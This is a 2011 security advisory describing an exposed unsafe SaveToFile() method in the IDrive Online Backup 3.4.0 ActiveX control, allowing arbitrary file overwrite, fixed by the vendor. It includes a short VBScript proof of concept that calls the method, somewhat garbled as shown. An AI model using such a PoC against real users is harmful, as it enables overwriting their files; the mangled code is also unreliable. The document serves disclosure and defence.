IDrive Online Backup ActiveX control Insecure Method

Advisory ID:HTB23025
Product:IDrive Online Backup
Vendor:Pro Softnet Corporation
Vulnerable Versions:3.4.0 and probably prior
Tested Version:3.4.0
Advisory Publication:June 15, 2011 [without technical details]
Vendor Notification:June 15, 2011
Public Disclosure:July 6, 2011
Latest Update:July 6, 2011
Vulnerability Type:Exposed Unsafe ActiveX Method [CWE-618]
Risk Level:Critical
CVSSv2 Base Score:10 (AV:N/AC:L/Au:N/C:C/I:C/A:C)
Solution Status:Fixed by Vendor
Discovered and Provided:High-Tech Bridge Security Research Lab

Advisory Details:

High-Tech Bridge SA Security Research Lab has discovered vulnerability in IDrive Online Backup ActiveX control, which can be exploited to overwrite arbitrary files.

1) Insecure method in IDrive Online Backup ActiveX Control
The vulnerability is caused due to the UniBasicPack.UniTextBox (UniBasic100_EDA1811C.ocx) ActiveX control including the insecure "SaveToFile()" method. This can be exploited to rewrite arbitrary files in the context of the current user.
The following PoC code is available:
<object classid='clsid:979AE8AA-C206-40EC-ACA7-EC6B6BD7BE5E' id='target' /></object>
<input language=VBScript onclick=Boom() type=button value="Exploit">
<script language = 'vbscript'>
Sub Boom()
arg3="New_Fi le_Content"
t arget.SaveToFIle arg1,arg2
End Sub

How to Detect Exposed Unsafe ActiveX Method Vulnerabilities
Free Website Security Test
  • Non-intrusive GDPR Test
  • Non-intrusive PCI DSS Test
Try Free Test
ImmuniWeb® On-Demand
  • Complete GDPR Audit
  • Complete PCI DSS Audit
  • Remediation Guidelines
  • DevSecOps Integration
Learn More

Upgrade to the most recent version

[1] High-Tech Bridge Advisory HTB23025 - - IDrive Online Backup ActiveX Control
[2] IDrive Online Backup - - IDrive Online Backup is a solution for creating online backups.
[3] Common Weakness Enumeration (CWE) - - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
User Comments
Add Comment

Have additional information to submit?
Please feel free to send us any additional information related to this Advisory, such as vulnerable versions, additional exploitation details and conditions, patches and other relevant details.
Quick Start
Get a Demo